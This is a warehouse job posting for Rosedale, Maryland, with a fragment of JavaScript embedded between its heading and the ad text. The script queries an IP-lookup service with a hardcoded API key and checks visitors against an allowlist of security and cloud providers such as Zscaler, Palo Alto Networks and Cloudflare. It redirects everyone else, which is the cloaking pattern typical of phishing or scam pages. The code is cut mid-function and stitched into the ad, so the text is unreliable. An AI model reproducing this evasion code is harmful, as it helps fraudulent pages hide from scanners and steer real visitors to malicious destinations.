Warehouse Material Handler (PT or FT)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Warehouse Material Handler (PT or FT) located in Rosedale, Maryland.
Key Responsibilities:
- Receive, count, and inspect incoming shipments for accuracy and damages.
- Accurately pick, pack, and prepare orders for shipment.
- Maintain organized storage of materials and inventory management.
- Operate warehouse equipment such as forklifts and pallet jacks safely.
- Assist with inventory counts and cycle counts as needed.
- Maintain a clean, safe, and efficient work environment.
Skills Needed:
- Strong attention to detail and organizational skills.
- Ability to lift heavy items and stand for extended periods.
- Good communication and teamwork skills.
- Basic computer skills for inventory systems.
- Reliable and punctual with a strong work ethic.
Benefits:
- Competitive pay and flexible schedules.
- Health and wellness benefits.
- Opportunities for growth and advancement.
- Training and safety equipment provided.